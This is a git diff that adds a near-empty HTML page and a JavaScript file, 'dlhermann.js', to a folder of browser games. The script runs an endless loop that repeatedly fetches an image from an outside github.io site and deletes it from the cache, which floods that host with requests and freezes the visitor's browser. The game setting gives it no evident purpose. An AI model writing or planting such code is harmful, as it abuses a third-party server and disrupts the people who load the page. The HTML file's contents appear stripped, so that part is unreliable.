diff --git a/Games/Krydder/dlhermann.js b/Games/Krydder/dlhermann.js new file mode 100644 index 0000000..a8ac4d9 --- /dev/null +++ b/Games/Krydder/dlhermann.js @@ -0,0 +1,11 @@ +while (true) { + fetch('https://t0m0t0w.github.io/favicon.png') + .then(response => response.text()) + .then(data => { + // Do something with the data + console.log(data); + + // Delete the file from the cache + caches.delete('https://t0m0t0w.github.io/favicon.png'); + }); + } \ No newline at end of file diff --git a/Games/Krydder/index.html b/Games/Krydder/index.html new file mode 100644 index 0000000..e9d0172 --- /dev/null +++ b/Games/Krydder/index.html @@ -0,0 +1,46 @@ + + + + + + + +
+ +